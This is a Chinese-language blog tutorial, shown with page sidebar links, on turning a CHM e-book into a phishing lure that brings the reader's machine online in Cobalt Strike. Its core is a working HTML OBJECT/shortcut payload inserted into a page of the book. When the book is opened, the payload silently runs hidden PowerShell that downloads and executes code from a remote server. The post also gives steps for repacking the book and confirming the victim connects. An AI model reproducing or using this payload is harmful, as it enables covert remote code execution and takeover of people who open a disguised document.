当前位置:网站首页>电子书-CHM-上线CS
电子书-CHM-上线CS
2022-07-06 06:24:00 【zxl2605】
电子书-CHM-加载JS&PS-上线CS
1.对CS进行设置
服务端配置CS-客户端打开-攻击-钓鱼攻击-脚本web传递-配置选择监听器-设置端口-选择类型为power shell-点击开始-复制生成的利用代码
2.对当前.CHM电子书进行解压
进入文件后选择任意文件夹进入
3.这里演示:进入-设备管理-打开setleds.html
4.把CS生成的利用代码插入到body里面去
利用代码:
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe, -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:88/a'))">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
5. 插入完成后利用Easy CHM对解压后的电子书文件进行重新打包
6.新建-工程目录(电子书解压后的文件目录)-确定-点击编译-设置CHM保存
7.最后点击生成
8.下面打开电子书,看下CS会不会上线-成功上线
边栏推荐
- The whole process realizes the single sign on function and the solution of "canceltoken" of undefined when the request is canceled
- leetcode 24. 两两交换链表中的节点
- org. activiti. bpmn. exceptions. XMLException: cvc-complex-type. 2.4. a: Invalid content beginning with element 'outgoing' was found
- Simulation volume leetcode [general] 1061 Arrange the smallest equivalent strings in dictionary order
- 模拟卷Leetcode【普通】1109. 航班预订统计
- 翻译影视剧字幕,这些特点务必要了解
- Testing of web interface elements
- Summary of leetcode's dynamic programming 4
- Selenium source code read through · 9 | desiredcapabilities class analysis
- MFC 动态创建的对话框及改变控件的大小和位置
猜你喜欢
Win10 cannot operate (delete, cut) files
Convert the array selected by El tree into an array object
论文摘要翻译,多语言纯人工翻译
Full link voltage measurement: building three models
Black cat takes you to learn EMMC Protocol Part 10: EMMC read and write operation details (read & write)
How to extract login cookies when JMeter performs interface testing
MySQL5.72. MSI installation failed
Avtiviti创建表时报错:Error getting a new connection. Cause: org.apache.commons.dbcp.SQLNestedException
Isam2 operation process
Modify the list page on the basis of jeecg boot code generation (combined with customized components)
随机推荐
模拟卷Leetcode【普通】1249. 移除无效的括号
利用快捷方式-LNK-上线CS
leetcode 24. Exchange the nodes in the linked list in pairs
Black cat takes you to learn UFS protocol Chapter 4: detailed explanation of UFS protocol stack
Resttemplate and feign realize token transmission
Grouping convolution and DW convolution, residuals and inverted residuals, bottleneck and linearbottleneck
Luogu p2141 abacus mental arithmetic test
今日夏至 Today‘s summer solstice
org. activiti. bpmn. exceptions. XMLException: cvc-complex-type. 2.4. a: Invalid content beginning with element 'outgoing' was found
MFC 动态创建的对话框及改变控件的大小和位置
记一个基于JEECG-BOOT的比较复杂的增删改功能的实现
金融德语翻译,北京专业的翻译公司
leetcode 24. 两两交换链表中的节点
自定义指定路由上的Gateway过滤器工厂
基于JEECG-BOOT的list页面的地址栏参数传递
Postman core function analysis - parameterization and test report
基于JEECG-BOOT制作“左树右表”交互页面
Remember the implementation of a relatively complex addition, deletion and modification function based on jeecg-boot
基於JEECG-BOOT的list頁面的地址欄參數傳遞
联合索引的左匹配原则